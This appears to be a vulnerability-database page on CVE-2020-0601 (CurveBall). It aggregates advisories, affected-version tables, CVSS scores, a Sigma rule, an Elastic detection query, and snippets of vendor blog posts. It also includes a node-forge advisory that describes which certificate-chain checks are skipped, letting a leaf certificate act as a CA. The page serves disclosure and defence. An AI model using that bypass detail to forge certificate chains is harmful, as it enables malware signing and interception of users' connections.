CVE-2020-0601
Published: 2020-01-14
Severity: high · CVSS 3.1 base score 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N)
Tags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability (remediation due 2022-05-03)
Exploited in the wild
A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source, aka 'Windows CryptoAPI Spoofing Vulnerability'.
Affected
39 ranges, showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| golang | go | >= 1.12 < 1.12.16 | 1.12.16 |
| golang | go | >= 1.13 < 1.13.7 | 1.13.7 |
| chrome_chrome | — | — | — |
| microsoft | windows | — | — |
| microsoft | windows_10_version_1903_for_32-bit_systems | — | — |
| microsoft | windows_10_version_1903_for_arm64-based_systems | — | — |
| microsoft | windows_10_version_1903_for_x64-based_systems | — | — |
| microsoft | windows_10_version_1909_for_32-bit_systems | — | — |
| microsoft | windows_10_version_1909_for_arm64-based_systems | — | — |
| microsoft | windows_10_version_1909_for_x64-based_systems | — | — |
| microsoft | windows_server | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 8.1 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N |
| osv | — | 8.1 | HIGH | — |
| vulncheck | — | 8.1 | HIGH | — |
| cisa | — | 8.1 | HIGH | — |
GHSA · 2026-03-26 · CVE-2026-33896 [HIGH] CWE-295
Forge has a basicConstraints bypass in its certificate chain verification (RFC 5280 violation)
## Summary
`pki.verifyCertificateChain()` does not enforce RFC 5280 basicConstraints requirements when an intermediate certificate lacks both the `basicConstraints` and `keyUsage` extensions. This allows any leaf certificate (without these extensions) to act as a CA and sign other certificates, which node-forge will accept as valid.
## Technical Details
In `lib/x509.js`, the `verifyCertificateChain()` function (around lines 3147-3199) has two conditional checks for CA authorization:
1. The `keyUsage` check (which includes a sub-check requiring `basicConstraints` to be present) is gated on `keyUsageExt !== null`
2. The `basicConstraints.cA` check is gated on `bcExt !== null`
When a certifica
OSV · 2026-03-26 · CVE-2026-33896 [HIGH]
Forge has a basicConstraints bypass in its certificate chain verification (RFC 5280 violation)
OSV · 2022-08-01 · CVE-2020-0601 [HIGH] · CVSS 8.1
Certificate validation bypass on Windows in crypto/x509
A Windows vulnerability allows attackers to spoof valid certificate chains when the system root store is in use.
A workaround is present in Go 1.12.6+ and Go 1.13.7+, but affected users should additionally install the Windows security update to protect their system.
See https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0601 for details on the Windows vulnerability.
GHSA (unreviewed) · 2022-05-24 · CVE-2020-0601 [MEDIUM] CWE-295
GHSA-82jc-cv6x-r223: A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32
A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source, aka 'Windows CryptoAPI Spoofing Vulnerability'.
VulnCheck · 2020 · CVE-2020-0601 [HIGH] CWE-295 · CVSS 8.1
Microsoft Windows CryptoAPI Spoofing Vulnerability
Microsoft Windows CryptoAPI (Crypt32.dll) contains a spoofing vulnerability in the way it validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. A successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software. The vulnerability is also known under the moniker of CurveBall.
Affected: Microsoft Windows
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://cisa.gov/news-events/c
CISA · 2021-11-03 · CVE-2020-0601 [HIGH] CWE-295 · CVSS 8.1
Vulnerability: Microsoft Windows CryptoAPI Spoofing Vulnerability
Affected: Microsoft Windows
Microsoft Windows CryptoAPI (Crypt32.dll) contains a spoofing vulnerability in the way it validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. A successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software. The vulnerability is also known under the moniker of CurveBall.
Required Action: Apply updates per vendor instructions.
Notes: Reference CISA's ED 20-02 (https://www.cisa.gov/news-events/directives/e
Chrome · 2020-01-16 · CVE-2020-6380 [HIGH] · CVSS 8.1
Stable Channel Update for Desktop
CVE-2020-6380: Extension message verification error. Reported by Sergei Glazunov of Google Project Zero on 2019-12-09
[$N/A] [1040772] High N/A: Protections to mitigate Windows ECC certificate validation vulnerability CVE-2020-0601
Severity: high
Microsoft (MSRC) · 2020-01-14 · CVE-2020-0601 [HIGH] · CVSS 8.1
Windows CryptoAPI Spoofing Vulnerability
Description: A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates.
An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider.
A successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software.
The security update addresses the vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates
Sigma · CVE-2020-0601 [HIGH] · CVSS 8.1
Audit CVE Event
Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.
MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability).
Unfortunately, that is about the only instance of CVEs being written to this log.
Detection:
```yaml
logsource:
  product: windows
  service: application
detection:
  selection:
    EventID: 1
    Provider_Name:
      - Microsoft-Windows-Audit-CVE
      - Audit-CVE
  condition: selection
```
Elastic · CVE-2020-0601 [HIGH] · CVSS 8.1
Windows CryptoAPI Spoofing Vulnerability (CVE-2020-0601 - CurveBall)
A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source.
Query:
```
event.provider:"Microsoft-Windows-Audit-CVE" and message:"[CVE-2020-0601]" and host.os.type:windows
```
Bleepingcomputer · 2023-12-08
## Privilege elevation exploits used in over 50% of insider attacks
By: Bill Toulas
Elevation of privilege flaws are the most common vulnerability leveraged by corporate insiders when conducting unauthorized activities on networks, whether for malicious purposes or by downloading risky tools in a dangerous manner.
A report by Crowdstrike based on data gathered between January 2021 and April 2023 shows that insider threats are on the rise and that using privilege escalation flaws is a significant component of unauthorized activity.
According to the report, 55% of insider threats logged by the company rely on privilege escalation exploits, while the remaining 45% unwittingly introduce risks by downloading or misusing offensive tools.
Rogue insiders typically turn against their employer b
Qualys · 2023-07-18
Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers’ Edition)
## Table of Contents
- Top Ten Vulnerabilities Exploited by Threat Actors
- Top Ten Highly Active Threat Actors
- Top Ten Most Exploited Vulnerabilities by Malware
- Top Ten Most Active Malware
- Top Ten Vulnerabilities Exploited by Ransomware
- Prioritizing Exploited Vulnerabilities with Qualys VMDR and TruRisk
- Assess Your Organization's Exposure to Risk / TruRisk Dashboard
- Key Insights & Takeaways
- References
- Additional Contributor
The previous blog from this three-part series showcased an overview of the vulnerability threat landscape. To summarize quickly, it illustrated the popular methods of exploiting vulnerabilities and the tactical techniques employed by threat actors, malware, and ransomware groups. Perhaps more crucially, we stated that commonly used solutions (CISA KEV/EPSS) of
Qualys · 2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Qualys · 2021-11-09
Qualys Response to CISA Alert: Binding Operational Directive 22-01
## Table of Contents
- Overview
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA's Vulnerabilities Using Qualys VMDR
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
- Start your VMDR 30-day, no-cost trial today
## Overview
On November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released Binding Operational Directive 22-01, “Reducing the Significant Risk of Known Exploited Vulnerabilities.” This directive recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate
Trendmicro · 2021-04-28
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
Cyber Threats
## How Trend Micro Helps Manage Exploited Vulnerabilities
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Read how Trend Micro protects customers from vulnerability exploits by blocking them as early as possible.
By: Jon Clay, Apr 28, 2021
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Exploiting known vulnerabilities to successfully compromise an organization has long been a common tactic used by malicious actors. Whether Heartbleed, EternalBlue, or most recently Zerologon, threat actors take advantage of newly disclosed vulnerabilities in their attacks. But even with thousands of new vulnerabili
Tenable · 2020-12-08 · CVE-2020-4006 [CRITICAL] · CVSS 9.1
CVE-2020-4006: VMware Command Injection Flaw Exploited by Russian State-Sponsored Threat Actors
Tenable · 2020-10-23
Government Agencies Warn of State-Sponsored Actors Exploiting Publicly Known Vulnerabilities
Qualys · 2020-10-22 · CVE-2020-15505 [CRITICAL] · CVSS 9.8
NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities
#### Table of Contents
- Detect 25 Publicly Known Vulnerabilities using VMDR
Update November 25, 2020: The UK National Cyber Security Centre alerts that APT nation-state groups and cybercriminals are exploiting MobileIron RCE vulnerability (CVE-2020-15505).
Original post: On October 20, 2020, the United States National Security Agency (NSA) released a cybersecurity advisory on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.
“Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and mitigation efforts,” said the NSA advisory. It also recommended “crit
Fortinet · 2020-03-12 · CVE-2020-0796 [HIGH] · CVSS 8.8
CVE-2020-0796 Memory Corruption Vulnerability in Windows 10 SMB Server
FortiGuard Labs Threat Research
By Yijie Wang | March 12, 2020
FortiGuard Labs Threat Analysis Report
Affected platforms: Windows 10
Impacted parties: All Windows users
Impact: An unauthenticated attacker can exploit this wormable vulnerability to cause memory corruption, which may lead to remote code execution.
Severity level: High
Solution: All Windows 10 users are urged to apply the patch for CVE-2020-0796
Introduction
Microsoft recently released a patch for CVE-2020-0796, a critical SMB server vulnerability that affects Windows 10. An unauthenticated attacker can exploit this vulnerability to cause memory corruption, which may lead to remote code execution.
This SMB vulnerability also has the potential to
Trendmicro · 2020-02-13 · CVE-2020-0601 [HIGH] · CVSS 8.1
## A Technical Analysis of CurveBall (CVE-2020-0601)
A code-level root cause analysis of CVE-2020-0601 in the context of how applications are likely to use CryptoAPI to handle certificates — more specifically in the context of applications communicating via Transport Layer Security (TLS).
By: John Simpson, Feb 13, 2020
The first Microsoft patch Tuesday of 2020 contained fixes for CVE-2020-0601, a vulnerability discovered by the United States’ National Security Agency (NSA) that affects how cryptographic certificates are verified by one of the core cryptography libraries in Windows that make up part of the CryptoAPI system. Dubbed CurveBall or “Chain of Fools,” an attacker exploiting this vulnerability could potentially create their own cryptographic ce
Trendmicro · 2020-01-24 · [HIGH] · CVSS 8.1
Exploits & Vulnerabilities
# Trend Micro Creates Factory Honeypot to Trap Attackers
Dive into a research study that explores the risks associated with common cybersecurity vulnerabilities in a factory setting. Also, misconfigured Microsoft cloud databases containing 14 years of customer support logs exposed 250 million records.
By: Jon Clay, 2020/01/24
Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, dive into a research study that explores the risks associated with common cybersecurity vulnerabilities in a factory setting. Also, read about how misconfigured Microsoft cloud databases containing 14 years of customer support logs exposed 250 milli
Tenable · 2020-01-22
WEF Report: Cyberattacks Rank Just Below Climate Change as an Existential Threat
Fortinet · 2020-01-21
The Curveball Vulnerability Research Analysis
FortiGuard Labs Threat Research
By Udi Yavo | January 21, 2020
Introduction to Curveball Exploits
On Patch Tuesday for January 2020, Microsoft disclosed a critical vulnerability, discovered by the NSA, that the security research community has dubbed CurveBall or ChainOfFools. It affects the Windows 10, Windows 2016 and 2019 versions of crypt32.dll, the library that implements Windows’ CryptoAPI.
This vulnerability can be exploited by a malicious actor to spoof certificates in a way that will trick any software that leverages Windows CryptoAPI for signature validation into believing it is legitimate. For example, ransomware authors can trick Windows into believing that their samples have been signed by Microsoft.
Checkpoint · 2020-01-20 · CVE-2020-0601
20th January – Threat Intelligence Bulletin
## 20th January – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 20th January 2020, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
Hackers have stolen personal information in an attack on the Australian P&N bank. The attack focused on the bank’s CRM system, which stored a great deal of sensitive personal and financial information. Australia has also experienced a data breach of a bushfire donation site – hackers abused the outdated Magento CMS u
Krebs
Patch Tuesday, January 2020 Edition
blogs_krebs·2020-01-20
Patch Tuesday, January 2020 Edition
Microsoft today released updates to plug 50 security holes in various flavors of Windows and related software. The patch batch includes a fix for a flaw in Windows 10 and server equivalents of this operating system that prompted an unprecedented public warning from the U.S. National Security Agency. This month also marks the end of mainstream support for Windows 7, a still broadly-used operating system that will no longer be supplied with security updates.
An advisory (PDF) released today by the NSA says the flaw may have far more wide-ranging security implications, noting that the “exploitation of the vulnerability allows attackers to defeat trusted network connections and deliver executable code while appearing as legitimately trusted entities.”
“NSA assesses the vulnerability to be se
Trendmicro
Free tool to patch against Vulnerability CVE-2020-0601
blogs_trendmicro·2020-01-17·CVSS 8.1
CVE-2020-0601 [HIGH] Free tool to patch against Vulnerability CVE-2020-0601
## Free tool to patch against Vulnerability CVE-2020-0601
The best protection against this very serious vulnerability is to ensure the affected systems are patched with Microsoft’s latest security update.
By: Trend Micro | Jan 17, 2020
So much for a quiet January! By now you must have heard about the new Microsoft® vulnerability CVE-2020-0601, first disclosed by the NSA (making it the first Windows bug publicly attributed to the National Security Agency). This vulnerability is found in a cryptographic component that has a range of functions—an important one being the ability to digitally sign software, which certifies that the software has not been tampered with. Using this vulnerability, attackers can sign malicious executables to make them look legitim
Unit42
Threat Brief: Windows CryptoAPI Spoofing Vulnerability CVE-2020-0601
blogs_unit42·2020-01-17·CVSS 8.1
CVE-2020-0601 [HIGH] Threat Brief: Windows CryptoAPI Spoofing Vulnerability CVE-2020-0601
Brandon Young, Mike Harbison | Published: January 17, 2020
## Executive Summary
In January 2020, during the first Patch Tuesday of the new year, Microsoft released patches for 17 new vulnerabilities including one for CVE-2020-0601 known as Curveball. The vulnerability exists in the Windows CryptoAPI (Crypt32.dll) and specifically relates to the method used for Elliptic Curve Cryptography (ECC) certificate validation. At the time of release, Microsoft affirmed that they had not yet seen the vulnerability exploited in the wild (ITW). Researcher Tal Be’ery released a blog titled “Win 10 Crypto Vulnerability: Cheating in Elliptic Curve Billiard 2” that does a fantastic job at explaining this bug.
### Mitigation Actions
The patch provided by Microsoft included the typical release of operating system patches, but this time a new Application Programmi
Trendmicro
Public PoC for critical Microsoft NSA bug
blogs_trendmicro·2020-01-17·CVSS 8.1
CVE-2020-0601 [HIGH] Public PoC for critical Microsoft NSA bug
Exploitation of vulnerabilities
## Public PoC for critical Microsoft NSA bug
Security researchers have published proof-of-concept code for exploiting CurveBall (CVE-2020-0601). It is the first vulnerability that the National Security Agency (NSA) has reported.
By: Trend Micro | Jan 17, 2020
The security researchers Saleem Rashid, Kudelski Security and Ollypwn have published proof-of-concept code for exploiting CurveBall (CVE-2020-0601). It is the first vulnerability that the National Security Agency (NSA) has reported. The flaw was addressed in the first Patch Tuesday cycle of 2020 and concerns CryptoAPI's validation of Elliptic Curve Cryptography (ECC) certificates
Talos
Threat Source newsletter (Jan. 16, 2019)
blogs_talos·2020-01-16
Threat Source newsletter (Jan. 16, 2019)
Newsletter compiled by Jon Munshaw.
Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.
This wasn’t your average Patch Tuesday. Microsoft’s monthly security update was notable for a few reasons. For starters, it’s really time to give up Windows 7, since this is the last free update Microsoft will issue for the operating system.
There was also a vulnerability that made headlines for leaving Windows open to cryptographic spoofing, which could allow an attacker to sign a malicious file as if it came from a trusted source. The bug was so severe that Microsoft even reached out to the U.S. military ahead of time to issue them an early patch. For more on Patch Tuesday, you can check out our roundup here and our Snort rule
Fortinet
Addressing Microsoft’s January 2020 Security Update for CVE-2020-0601
blogs_fortinet·2020-01-15·CVSS 8.1
CVE-2020-0601 [HIGH] Addressing Microsoft’s January 2020 Security Update for CVE-2020-0601
FORTIGUARD LABS THREAT RESEARCH
Addressing Microsoft’s January 2020 Security Update for CVE-2020-0601
By FortiGuard SE Team | January 15, 2020
Microsoft’s Security Updates for January 2020 (commonly known as Patch Tuesday) were released to the public on January 14. On Monday there were rumblings across the Twittersphere that a high profile vulnerability would be addressed in today’s Patch Tuesday update. And in their cumulative update, Microsoft addressed 50 CVEs, along with one notable vulnerability – CVE-2020-0601 (CryptoAPI Spoofing Vulnerability).
CVE-2020-0601 Details
First discovered by The US National Security Agency (NSA) and disclosed to Microsoft, CVE-2020-0601 is a spoofing vulnerability which exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptog
Trendmicro
January Patch Tuesday: IE, RDP, Crypto Bugs Updates
blogs_trendmicro·2020-01-15·CVSS 9.8
[CRITICAL] January Patch Tuesday: IE, RDP, Crypto Bugs Updates
## January Patch Tuesday: IE, RDP, Crypto Bugs Updates
Microsoft released 49 patches in this cycle, eight of which are classified Critical and the remaining 41 as Important. The fixes address a range of products, including RDP Gateway servers, Internet Explorer, CryptoAPI, Office, and OneDrive.
By: Trend Micro | 2020/01/15
2020 starts off with a relatively heavy list of patches for Microsoft users. January is typically a light month for fixes, but Microsoft released patches for 49 vulnerabilities (eight of which are Critical and all the remaining classified as Important) in this cycle. None of these vulnerabilities are known to be under attack at this time.
The listed vulnerabilities covered a range of Microsoft products including Windows RDP Gateway ser
Krebs
Patch Tuesday, January 2020 Edition
blogs_krebs·2020-01-15·CVSS 8.1
[HIGH] Patch Tuesday, January 2020 Edition
As first reported Monday by KrebsOnSecurity, Microsoft addressed a severe bug (CVE-2020-0601) in Windows 10 and Windows Server 2016/19 reported by the NSA that allows an attacker to spoof the digital signature tied to a specific piece of software. Such a weakness could be abused by attackers to make malware appear to be a benign pro
Tenable
Tenable Releases Plugins for Critical Windows CryptoAPI Vulnerability
blogs_tenable·2020-01-15·CVSS 8.1
CVE-2020-0601 [HIGH] Tenable Releases Plugins for Critical Windows CryptoAPI Vulnerability
## Tenable Releases Plugins for Critical Windows CryptoAPI Vulnerability
January 15, 2020 · Columbia, MD
Tenable®, Inc. , the Cyber Exposure company, has released plugins for CVE-2020-0601, a critical vulnerability in the cryptographic library used in Windows 10 and Windows Server 2016/2019. The flaw would allow attackers to deliver malicious code that appears to be from a trusted entity.
The vulnerability, which was disclosed by the National Security Agency (NSA), reportedly bypasses Windows’ capability to verify cryptographic trust, which would enable an attacker to pass malicious applications off as legitimate, trusted code.
“This vulnerability, and the attention it’s received from various government agencies, is unprecedented. It calls into question our very trust in today’s digita
Krebs
Cryptic Rumblings Ahead of First 2020 Patch Tuesday
blogs_krebs·2020-01-14
Cryptic Rumblings Ahead of First 2020 Patch Tuesday
Sources tell KrebsOnSecurity that Microsoft Corp. is slated to release a software update on Tuesday to fix an extraordinarily serious security vulnerability in a core cryptographic component present in all versions of Windows. Those sources say Microsoft has quietly shipped a patch for the bug to branches of the U.S. military and to other high-value customers/targets that manage key Internet infrastructure, and that those organizations have been asked to sign agreements preventing them from disclosing details of the flaw prior to Jan. 14, the first Patch Tuesday of 2020.
According to sources, the vulnerability in question resides in a Windows component known as crypt32.dll, a Windows module that Microsoft says handles “certificate and cryptographic messaging functions in the CryptoAPI.”
Qualys
Microsoft Windows CryptoAPI Spoofing Vulnerability (CVE-2020-0601) – How to Detect and Remediate
blogs_qualys·2020-01-14·CVSS 8.1
CVE-2020-0601 [HIGH] Microsoft Windows CryptoAPI Spoofing Vulnerability (CVE-2020-0601) – How to Detect and Remediate
## Table of Contents
- Exploits/PoC
- Detecting CVE-2020-0601 with Qualys VM
- Remediating with Qualys Patch Management
- Qualys Threat Protection
- Mitigation
- Get Started Now
Update January 31, 2020 : Client testing is now available at clienttest.ssllabs.com .
Update January 15, 2020 : Detection dashboard now available.
Today, Microsoft released a patch for CVE-2020-0601, aka Curveball, a vulnerability in the Windows “crypt32.dll” component that could allow attackers to perform spoofing attacks. It was discovered and reported by National Security Agency (NSA) researchers. The vulnerability affects Windows 10 and Windows Server 2016/2019 systems.
This is a serious vulnerability and patches should be applied immediately. An attacker could exploit this vulnerability by using a spoofed code-si
Talos
Microsoft Patch Tuesday — Jan. 2020: Vulnerability disclosures and Snort coverage
blogs_talos·2020-01-14·CVSS 8.1
CVE-2020-0601 [HIGH] Microsoft Patch Tuesday — Jan. 2020: Vulnerability disclosures and Snort coverage
## Microsoft Patch Tuesday — Jan. 2020: Vulnerability disclosures and Snort coverage
By Jon Munshaw. Updated January 15th: Added an Advanced Custom Detection (ACD) signature for AMP that can be used to detect exploitation of CVE-2020-0601 by spoofing certificates masquerading as a Microsoft ECC Code Signing Certificate Authority.
Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month's Patch Tuesday covers 49 vulnerabilities, eight of which are considered critical.
This month's security update is particularly important for its disclosure of two vulnerabilities related to a core cryptographic component in all versions of Windows. CVE-2020-0601 could allow an attacker to use cryptography to sign a malicious executable, making the file appear as if it was from a trusted sou
Zscaler
Critical Windows Update-CryptoAPI Spoofing | Blog
blogs_zscaler·2020-01-14
Critical Windows Update-CryptoAPI Spoofing | Blog
Tenable
Microsoft’s January 2020 Patch Tuesday Kicks Off the New Year with 49 New CVEs
blogs_tenable·2020-01-14
Microsoft’s January 2020 Patch Tuesday Kicks Off the New Year with 49 New CVEs
Qualys
January 2020 Patch Tuesday – 50 Vulns, 8 Critical, Adobe Vulns | Qualys
blogs_qualys·2020-01-14·CVSS 8.1
CVE-2020-0601 [HIGH] January 2020 Patch Tuesday – 50 Vulns, 8 Critical, Adobe Vulns | Qualys
This month’s Microsoft Patch Tuesday addresses 50 vulnerabilities with only 8 of them labeled as Critical. Of the 8 Critical vulns, one is for browser and scripting engines, 3 are for .NET Framework and one for ASP.NET. In addition, Microsoft has patched 3 critical RCEs in Remote Desktop Gateway and Remote Desktop Client. Adobe issued patches today for Illustrator CC and Experience Manager.
### CryptoAPI Spoofing
A spoofing vulnerability (CVE-2020-0601) has been patched in Windows CryptoAPI (Crypt32.dll). An attacker can perform man-in-the-middle attacks and decrypt confidential information on user connections to the affected software by using a spoofed code-signing certificate. Although Microsoft rated this as Important, NSA privately disclosed this vulnerability to Microsoft and should
Tenable
CVE-2020-0601: NSA Reported Spoofing Vulnerability in Windows CryptoAPI
blogs_tenable·2020-01-14·CVSS 8.1
[HIGH] CVE-2020-0601: NSA Reported Spoofing Vulnerability in Windows CryptoAPI
Sentinelone
MedusaLocker Ransomware: Encryption, Costs, and Protection
blogs_sentinelone·2019-11-28
MedusaLocker Ransomware: Encryption, Costs, and Protection
In September of this year, our research team began to track and observe a recently-identified ransomware family dubbed MedusaLocker . This particular ransomware family has a few unique features designed to ensure it encrypts as much data as possible, not only on the locally infected machine but across a network. MedusaLocker’s ability to force connectivity to remote (mapped) drives along with its persistence mechanisms are particularly problematic. In this post, we take a look at how MedusaLocker works and how it is different from other recent ransomware strains.
Delivery of MedusaLocker follows a fairly standard and established pattern. Current data indicates that the malicious payloads are distributed via phishing and spam email. The examples we have analyzed show the malware attached d
Fortinet
Fortinet Security Researchers Discover Multiple Vulnerabilities in Adobe and Cisco Products
blogs_fortinet·2019-11-15·CVSS 9.8
[CRITICAL] Fortinet Security Researchers Discover Multiple Vulnerabilities in Adobe and Cisco Products
FORTIGUARD LABS THREAT RESEARCH
Fortinet Security Researchers Discover Multiple Vulnerabilities in Adobe and Cisco Products
By Peixue Li | November 15, 2019
This past Patch Tuesday, November 12th, Adobe announced a number of Security Updates for Adobe Illustrator CC. They included two critical vulnerabilities that were originally discovered by Fortinet Threat Researcher Kushal Arvind Shah.
The week before, on Wednesday, November 6th, a number of Security Updates were also released by Cisco Systems. They included five high risk vulnerabilities for their Cisco Webex Network Recording Player and Webex Player tools. These vulnerabilities were also discovered by Kushal Arvind Shah as well as Fortinet security researcher Yici Zhang.
All of these vulnerabilities have now been patched. More in
Fortinet
CVE-2019-0708 – Remote Desktop Protocol and Remote Code Execution #Bluekeep
blogs_fortinet·2019-05-23·CVSS 9.8
CVE-2019-0708 [CRITICAL] CVE-2019-0708 – Remote Desktop Protocol and Remote Code Execution #Bluekeep
FORTIGUARD LABS THREAT RESEARCH
CVE-2019-0708 – Remote Desktop Protocol and Remote Code Execution #Bluekeep
By FortiGuard SE Team | May 23, 2019
On May 14th, 2019, Microsoft released their usual set of updates, referred to within the industry as “Patch Tuesday.” At first glance, the inclusion of CVE-2019-0708 appeared to be similar to all the other updates released on that day—it included a writeup containing an overview of the update, including the Impact (Remote Code Execution), Severity (Critical), and Platforms (multiple) affected.
However, what piqued the curiosity of the security community was that the platforms listed as affected by this vulnerability were products considered to be no longer supported by Microsoft:
Windows XP SP3 x86, Windows XP Professional x64 Edition SP2, Win
Zscaler
Zscaler protects against 3 new vulnerabilities for Microsoft Windows and Internet Explorer | Zscaler
blogs_zscaler·CVSS 8.1
[HIGH] Zscaler protects against 3 new vulnerabilities for Microsoft Windows and Internet Explorer | Zscaler
Crowdstrike
How Insiders Use Vulnerabilities Against Organizations
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] How Insiders Use Vulnerabilities Against Organizations
Crowdstrike
CrowdStrike Protects Against CVE-2020-0601 Vulnerability
blogs_crowdstrike·CVSS 8.1
CVE-2020-0601 [HIGH] CrowdStrike Protects Against CVE-2020-0601 Vulnerability
Crowdstrike
Vulnerability Roundup: 10 Critical CVEs of 2020
blogs_crowdstrike·CVSS 7.5
arXiv
TELSAFE: Security Gap Quantitative Risk Assessment Framework
arxiv_fulltext·2025-07-09
Sarah Ali Siddiqui (1), Chandra Thapa (1), Derui Wang (1), Rayne Holland (1), Wei Shao (1), Seyit Camtepe (1), Hajime Suzuki (1) and Rajiv Shah (2)
(1) CSIRO Data61, Sydney, Australia
(2) MDR Security, Canberra, Australia
## Abstract
Gaps between established security standards and their practical implementation have the potential to introduce vulnerabilities, possibly exposing them to security risks. To effectively address and mitigate these security and compliance challenges, security risk management strategies are essential.
However, it must adhere to well-established strategies and industry standards to ensure consistency, reliability, and compatibility both within and across organiza
arXiv
Do Chase Your Tail! Missing Key Aspects Augmentation in Textual Vulnerability Descriptions of Long-tail Software through Feature Inference
arxiv_fulltext·2024-12-15
Linyi Han, Shidong Pan, Zhenchang Xing, Jiamou Sun, Sofonias Yitagesu, Xiaowang Zhang, Zhiyong Feng
Corresponding author: Xiaowang Zhang
Linyi Han, Sofonias Yitagesu, Xiaowang Zhang, and Zhiyong Feng are with the College of Intelligence and Computing, Tianjin University, Tianjin, China. E-mail: {hanly2, xiaowangzhang, zyfeng}@tju.edu.cn
Shidong Pan, Zhenchang Xing, and Jiamou Sun are with CSIRO's Data61, Canberra, Australia. E-mail: {Shidong.Pan, Zhenchang.Xing, Frank.Sun}@data61.csiro.au
Linyi Han is also the Center of National Railway Intelligent Transportation System Engineeri
arXiv
Microservice Vulnerability Analysis: A Literature Review with Empirical Insights
arxiv_fulltext·2024-07-31
Raveen Kanishka Jayalath* (University of Adelaide, Australia), Hussain Ahmad* (University of Adelaide, Australia), Diksha Goel (CSIRO's Data61, Australia), Muhammad Shuja Syed (SLB, USA), Faheem Ullah (University of Adelaide, Australia)
* These authors contributed equally to this work; corresponding author: Hussain Ahmad.
## Abstract
Microservice architectures are revolutionizing both small businesses and large corporations, igniting a new era of innovation with their exceptional advantages in maintainability, reusability, and scalability. However, these benefits come w
arXiv
Crimson: Empowering Strategic Reasoning in Cybersecurity through Large Language Models
arxiv_fulltext·2024-03-01
Jiandong Jin (1), Bowen Tang (1), Mingxuan Ma (1), Xiao Liu (1), Yunfei Wang (2), Qingnan Lai (1), Jia Yang (1), Changling Zhou (1, corresponding author)
(1) Peking University, Beijing, China
(2) National University of Defense Technology, Changsha, China
## Abstract
We introduce Crimson, a system that enhances the strategic reasoning capabilities of Large Language Models (LLMs) within the realm of cybersecurity. By correlating CVEs with MITRE ATT&CK techniques, Crimson advances threat anticipation and strategic defense efforts. Our approach includes defining and evaluating cybersecurity strategic tasks, alongside implementing a comprehensive human-in-the-loop data-synthetic workflow to devel
CAPEC
Signature Spoofing by Improper Validation
mitre_capec
CAPEC-475: Signature Spoofing by Improper Validation
